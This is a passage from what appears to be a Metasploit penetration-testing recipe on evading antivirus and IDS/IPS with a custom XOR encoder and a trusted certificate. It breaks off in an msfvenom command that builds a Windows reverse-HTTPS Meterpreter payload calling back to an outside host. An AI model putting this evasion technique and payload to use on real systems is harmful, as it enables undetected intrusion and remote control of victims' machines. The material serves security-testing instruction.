Bypassing antivirus and IDS/IPS
As time went by, and Metasploit became the tool to use for exploitation, security vendors started to detect and stop exploits from running. As we have seen in the previous chapter, some did this by detecting the encoders used, others simply by detecting the default certificate used to encrypt the communication between the payloads and the listener. One approach to bypassing these solutions is to combine the use of custom encoders and trusted certificates.
How to do it...
In this recipe, we will combine several bypass techniques in order to successfully bypass antivirus and IDS/IPS solutions.
- First, we will create the payload using the
bf_xor
custom encoder used in the previous chapter; this way we can ensure that the solution looking for the default encoders won't flag our payload as malware:
root@Metasploit:~# msfvenom -p windows/meterpreter/reverse_winhttps LHOST=zinitiative.com LPORT=443 HandlerSSLCert=./unified.pem StagerVerifySSLCert=true -f exe -e x86/bf_xor...